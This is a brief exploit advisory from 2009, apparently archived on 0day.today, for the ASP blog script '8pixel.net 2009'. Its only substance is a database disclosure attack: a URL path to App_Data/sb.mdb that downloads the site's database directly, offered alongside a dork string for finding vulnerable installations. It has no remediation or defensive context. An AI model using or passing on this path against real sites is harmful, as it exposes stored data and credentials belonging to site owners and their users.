id: 10340
date: 12/20/2009
title: 8pixel.net 2009. Database Disclosure Vulnerability
author: LionTurk
cves: 

==================================================
8pixel.net 2009. Database Disclosure Vulnerability
==================================================

============================================================================== 
 
        [&#65533;] 8pixel.net 2009.  Database Disclosure Vulnerability 
 
============================================================================== 
 
    
 
    [&#65533;] Script:             [  8pixel.net 2009.  ] 
 
    [&#65533;] Language:           [ ASP ] 
 
    [&#65533;] Download:           [ http://www.8pixel.net/downloads.aspx ]  
########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
    [&#65533;] http://[target].com/[path]/App_Data/sb.mdb
 
 
 
   [&#65533;] ( c ) 8pixel.net 2009. All Rights Reserved or 8pixel.net Blog v4 



#  0day.today [2023-03-24]  #